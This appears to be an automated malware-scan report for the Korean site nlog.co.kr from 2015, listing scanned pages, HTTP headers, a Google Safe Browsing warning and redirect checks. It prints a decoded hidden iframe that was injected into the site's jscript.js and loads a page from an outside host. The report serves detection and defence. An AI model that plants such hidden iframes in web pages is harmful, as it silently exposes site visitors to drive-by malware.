Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nlog.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nlog.co.kr/ | 200 OK Content-Length: 14996 Content-Type: text/html | clean |
http://nlog.co.kr/jscript.js | 200 OK Content-Length: 2082 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. function addFavorites( favoriteurl, favoritetitle ){
if (document.all) window.external.AddFavorite(favoriteurl,favoritetitle); } function writeMailAddr( emailAddr ){ mailAddr = emailAddr + "@" + "kioomsoft.com"; document.write( "<a href=mailto:" + mailAddr +" class=foot>" + mailAddr + "</a>" ); } function writeMailAddr2( emailAddr ){ mailAddr = emailAddr + "@" + "kioomsoft ...[1802 bytes skipped]... Decoded script: <iframe src='http://action.orp.co.kr/operation/New/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://nlog.co.kr/login/login.asp | 200 OK Content-Length: 15411 Content-Type: text/html | clean |
http://nlog.co.kr/information/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 07:26:15 GMT Location: overview.asp Server: Microsoft-IIS/6.0 Content-Length: 133 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCAADTSA=EKHBLFJCNDNMKGGDJDCIPJFF; path=/ X-Powered-By: ASP.NET | clean |
http://nlog.co.kr/information/overview.asp | 200 OK Content-Length: 15334 Content-Type: text/html | clean |
http://nlog.co.kr/register/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 07:26:19 GMT Location: overview.asp Server: Microsoft-IIS/6.0 Content-Length: 133 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCAADTSA=GKHBLFJCNOMCKLIGIIPFAOAK; path=/ X-Powered-By: ASP.NET | clean |
http://nlog.co.kr/register/overview.asp | 200 OK Content-Length: 20054 Content-Type: text/html | clean |
http://nlog.co.kr/question/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 07:26:22 GMT Location: overview.asp Server: Microsoft-IIS/6.0 Content-Length: 133 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCAADTSA=IKHBLFJCMJBKFNJACPEDEEML; path=/ X-Powered-By: ASP.NET | clean |
http://nlog.co.kr/question/overview.asp | 200 OK Content-Length: 13788 Content-Type: text/html | clean |
http://nlog.co.kr/partner/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 07:26:24 GMT Location: overview.asp Server: Microsoft-IIS/6.0 Content-Length: 133 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCAADTSA=KKHBLFJCOHMIDAJGPMOCBGCI; path=/ X-Powered-By: ASP.NET | clean |
http://nlog.co.kr/partner/overview.asp | 200 OK Content-Length: 18452 Content-Type: text/html | clean |
http://nlog.co.kr/support/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 07:26:27 GMT Location: /mailsender/support.asp Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCAADTSA=MKHBLFJCFGABLDIMJJNBJPEP; path=/ X-Powered-By: ASP.NET | clean |
http://nlog.co.kr/mailsender/support.asp | 200 OK Content-Length: 15379 Content-Type: text/html | clean |
http://nlog.co.kr/company/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Wed, 14 Jan 2015 07:26:30 GMT Location: overview.asp Server: Microsoft-IIS/6.0 Content-Length: 133 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCAADTSA=OKHBLFJCKIAJEGALPKGNGKDE; path=/ X-Powered-By: ASP.NET | clean |
http://nlog.co.kr/company/overview.asp | 200 OK Content-Length: 15793 Content-Type: text/html | clean |
http://nlog.co.kr/news/news.asp | 200 OK Content-Length: 16841 Content-Type: text/html | clean |
http://nlog.co.kr/company/customer.asp | 200 OK Content-Length: 14926 Content-Type: text/html | clean |
http://nlog.co.kr/company/partner.asp | 200 OK Content-Length: 14928 Content-Type: text/html | clean |
http://nlog.co.kr/company/award.asp | 200 OK Content-Length: 14935 Content-Type: text/html | clean |
http://nlog.co.kr/company/contact.asp | 200 OK Content-Length: 15587 Content-Type: text/html | clean |
http://nlog.co.kr/company/agreement.asp | 200 OK Content-Length: 29134 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nlog.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 14 Jan 2015 07:26:06 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14996
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCAADTSA=BKHBLFJCEHEBAGIGHFPBHCGN; path=/
X-Powered-By: ASP.NET
...14996 bytes of data.
GET / HTTP/1.1
Host: nlog.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 14 Jan 2015 07:26:06 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14996
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCAADTSA=BKHBLFJCEHEBAGIGHFPBHCGN; path=/
X-Powered-By: ASP.NET
...14996 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nlog.co.kr
Referer: http://www.google.com/search?q=nlog.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nlog.co.kr
Referer: http://www.google.com/search?q=nlog.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.